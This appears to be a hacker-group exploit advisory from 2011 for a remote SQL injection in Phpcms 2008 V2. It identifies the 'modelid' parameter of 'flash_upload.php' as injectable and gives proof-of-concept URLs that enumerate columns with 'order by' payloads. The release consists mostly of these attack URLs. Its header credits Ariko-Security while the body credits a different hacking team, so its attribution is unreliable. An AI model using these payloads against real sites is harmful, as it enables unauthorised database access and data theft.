# Ariko-Security: Security Audits (Audyt bezpieczeństwa)
# Advisory: 5/2011
Phpcms 2008 SQL Injection Vulnerability
[~] Type: REMOTE SQL iNJECTioN
[~] Vendor: www.phpcms.cn
[+] Software: Phpcms 2008 V2
[+] author: ((R3d-D3v!L))
[~]
[+] TEAM: Xp10_hACKEr & 403-T3AM
[~]
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 17.jan.2011
[?] T!ME: 05:15 am GMT
[?] Home: WwW.XP10.COM
[^] Xp10_hAcKEr
[?]
======================================================================================
# REMOTE SQL iNJECTioN Vulnerabilities
======================================================================================
[*] Err0r C0N50L3:
http://server/bbs/phpcms_th/flash_upload.php?modelid= EV!L INJECT!ON
[*] proof of concept =
http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+20-- (false)
http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+19-- (TruE)
Already tested on Windows XP